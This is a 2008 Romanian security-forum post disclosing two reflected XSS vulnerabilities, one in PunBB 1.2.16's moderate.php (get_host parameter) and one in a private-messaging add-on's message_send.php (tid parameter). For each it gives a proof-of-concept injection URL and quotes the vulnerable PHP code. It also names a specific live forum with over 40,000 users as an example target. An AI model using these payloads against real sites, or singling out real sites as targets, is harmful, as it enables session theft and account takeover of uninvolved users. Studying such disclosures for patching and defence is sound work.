tw8 Posted January 8, 2008 Report Share Posted January 8, 2008 Salut!Am gasit 2 vulnerabilitati de tip XSS in PunBB si m-am gandit sa le impart cu voi . Pentru cei care nu stiu ce e PunBB, aruncati o privire pe site-ul oficial.Vulnerabilitatea #1 (necesita drepturi de admin/moderator)Download script : http://punbb.org/download/punbb-1.2.16.zip[url]http://[localhost]/[/url][path]/moderate.php?get_host=0.0.0.0">[script]Cod vulnerabilif (isset($_GET['get_host'])){ if ($pun_user['g_id'] > PUN_MOD) message($lang_common['No permission']); // Is get_host an IP address or a post ID? if (@preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/', $_GET['get_host'])) $ip = $_GET['get_host']; else { $get_host = intval($_GET['get_host']); if ($get_host < 1) message($lang_common['Bad request']); $result = $db->query('SELECT poster_ip FROM '.$db->prefix.'posts WHERE id='.$get_host) or error('Unable to fetch post IP address', __FILE__, __LINE__, $db->error()); if (!$db->num_rows($result)) message($lang_common['Bad request']); $ip = $db->result($result); } message('The IP address is: '.$ip.'The host name is: '.@gethostbyaddr($ip).'[url="admin_users.php?show_users='.$ip.'"]Show more users for this IP[/url]');}Vulnerabilitatea #2 (nesesita Private Messaging System instalat)Download script: http://www.punres.org/download.php?id=1579[url]http://[localhost]/[/url][path]/message_send.php?id=2&tid=">[script]Cod vulnerabil<input type="hidden" name="topic_redirect" value="<?php echo isset($_GET['tid']) ? $_GET['tid'] : '' ?>" />Exemplu de forum vulnerabil cu > 40.000 useri:[url]http://www.deblok83.com/forum.php[/url]P.S.: Nu am cerut acordul nimanui sa pun RST in titlu, pentru ca kwe e "Stepped Out", iar PM-ul se citeste cam rar. Asa ca, daca nu sunteti de acord, puteti sterge RST din titlu, dar eu nu cred ca e ceva rau .Bafta ! Quote Link to comment Share on other sites More sharing options...
